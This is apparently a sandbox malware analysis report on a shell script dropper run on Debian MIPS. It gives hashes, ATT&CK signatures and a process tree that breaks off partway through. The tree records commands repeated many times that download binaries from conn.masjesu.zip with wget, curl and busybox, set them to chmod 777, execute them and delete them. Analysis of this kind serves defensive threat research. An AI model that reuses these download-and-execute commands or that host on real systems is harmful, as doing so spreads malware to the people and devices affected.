86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0

Analysis

max time kernel
95s
max time network
97s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
15/10/2024, 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Size

10KB
MD5

5b7965317583f6ec3ecb200b64ab84dc
SHA1

242199969bb87b8f91c50399dbc9a2fcfa918cb9
SHA256

86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0
SHA512

53de4e8bcba6392755c42f5be1d230e71dbcd45fae9f4be439577b82097ac9039117b0ffed7bfe710b8e3bf6546d6c771c9b799d5b0c902e961fd5b43daf05b7
SSDEEP

96:YV1hXrraLcgAGdJdVPd2ZdTUcg69wLwsxLxpMLK9XKlK9l90+YWGuaYaUaG1l/VR:PAaSJSds6Pv8EdPvF8kKc

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
761	chmod
968	chmod
737	chmod
817	chmod
952	chmod
1004	chmod
880	chmod
888	chmod
944	chmod
790	chmod
864	chmod
904	chmod
1018	chmod
744	chmod
872	chmod
920	chmod
928	chmod
1011	chmod
810	chmod
841	chmod
912	chmod
983	chmod
990	chmod
997	chmod
896	chmod
936	chmod
960	chmod
976	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
755	busybox
820	wget
825	curl
846	wget
980	curl
1015	curl
809	busybox
869	curl
876	wget
940	wget
806	curl
877	curl
908	wget
951	busybox
1001	curl
747	wget
766	wget
796	wget
979	wget
1008	curl
893	curl
919	busybox
1014	wget
863	busybox
903	busybox
735	busybox
740	wget
925	curl
943	busybox
949	curl
956	wget
957	curl
743	busybox
816	busybox
887	busybox
892	wget
895	busybox
916	wget
935	busybox
941	curl
972	wget
996	busybox
729	curl
741	curl
814	curl
909	curl
917	curl
959	busybox
973	curl
715	wget
748	curl
927	busybox
871	busybox
948	wget
986	wget
989	busybox
1003	busybox
777	curl
785	busybox
868	wget
885	curl
932	wget
933	curl
967	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	curl
File opened for modification	/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	curl
File opened for modification	/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	curl
File opened for modification	/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	curl
File opened for modification	/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	curl
File opened for modification	/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	curl
File opened for modification	/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	curl
File opened for modification	/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	curl
File opened for modification	/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	curl
File opened for modification	/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	curl
File opened for modification	/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	curl
File opened for modification	/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	curl
File opened for modification	/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	curl
File opened for modification	/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	curl
File opened for modification	/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	curl
File opened for modification	/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	curl
File opened for modification	/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	curl
File opened for modification	/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	curl
File opened for modification	/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	curl
File opened for modification	/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	curl
File opened for modification	/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	curl
File opened for modification	/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	curl
File opened for modification	/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	curl
File opened for modification	/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	curl
File opened for modification	/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	curl
File opened for modification	/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	curl
File opened for modification	/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	curl
File opened for modification	/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	curl

/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
1⤵
PID:704
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:707
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - System Network Configuration Discovery
  PID:715
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:729
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - System Network Configuration Discovery
  PID:735
- /bin/chmod
  chmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  ./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Executes dropped EXE
  PID:738
- /bin/rm
  rm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  PID:739
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - System Network Configuration Discovery
  PID:740
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - System Network Configuration Discovery
  PID:743
- /bin/chmod
  chmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  ./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:746
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:747
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:755
- /bin/chmod
  chmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  ./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Executes dropped EXE
  PID:762
- /bin/rm
  rm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  PID:765
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:766
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:777
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:785
- /bin/chmod
  chmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - File and Directory Permissions Modification
  PID:790
- /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  ./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Executes dropped EXE
  PID:791
- /bin/rm
  rm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  PID:794
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - System Network Configuration Discovery
  PID:796
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - System Network Configuration Discovery
  PID:809
- /bin/chmod
  chmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  ./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Executes dropped EXE
  PID:811
- /bin/rm
  rm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  PID:812
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:813
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:814
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - System Network Configuration Discovery
  PID:816
- /bin/chmod
  chmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  ./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:819
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - System Network Configuration Discovery
  PID:820
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:825
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:833
- /bin/chmod
  chmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  ./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Executes dropped EXE
  PID:842
- /bin/rm
  rm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:845
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - System Network Configuration Discovery
  PID:846
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:855
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - System Network Configuration Discovery
  PID:863
- /bin/chmod
  chmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  ./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Executes dropped EXE
  PID:865
- /bin/rm
  rm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  PID:867
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:868
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:869
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:871
- /bin/chmod
  chmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  ./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Executes dropped EXE
  PID:873
- /bin/rm
  rm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  PID:875
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - System Network Configuration Discovery
  PID:876
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:877
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:879
- /bin/chmod
  chmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  ./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Executes dropped EXE
  PID:881
- /bin/rm
  rm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:887
- /bin/chmod
  chmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  ./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  PID:891
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:892
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:895
- /bin/chmod
  chmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  ./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  PID:899
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  PID:900
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:903
- /bin/chmod
  chmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  ./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Executes dropped EXE
  PID:905
- /bin/rm
  rm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - System Network Configuration Discovery
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  PID:911
- /bin/chmod
  chmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  ./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  PID:915
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - System Network Configuration Discovery
  PID:916
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - System Network Configuration Discovery
  PID:919
- /bin/chmod
  chmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  ./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  PID:923
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  PID:924
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:925
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:927
- /bin/chmod
  chmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  ./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Executes dropped EXE
  PID:929
- /bin/rm
  rm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  PID:931
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - System Network Configuration Discovery
  PID:932
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:933
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - System Network Configuration Discovery
  PID:935
- /bin/chmod
  chmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  ./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:943
- /bin/chmod
  chmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  ./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  PID:947
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:948
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:949
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:951
- /bin/chmod
  chmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  ./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Executes dropped EXE
  PID:953
- /bin/rm
  rm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  PID:955
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:956
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:957
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:959
- /bin/chmod
  chmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  ./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Executes dropped EXE
  PID:961
- /bin/rm
  rm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - System Network Configuration Discovery
  PID:967
- /bin/chmod
  chmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  ./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  PID:971
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - System Network Configuration Discovery
  PID:972
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:973
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  PID:975
- /bin/chmod
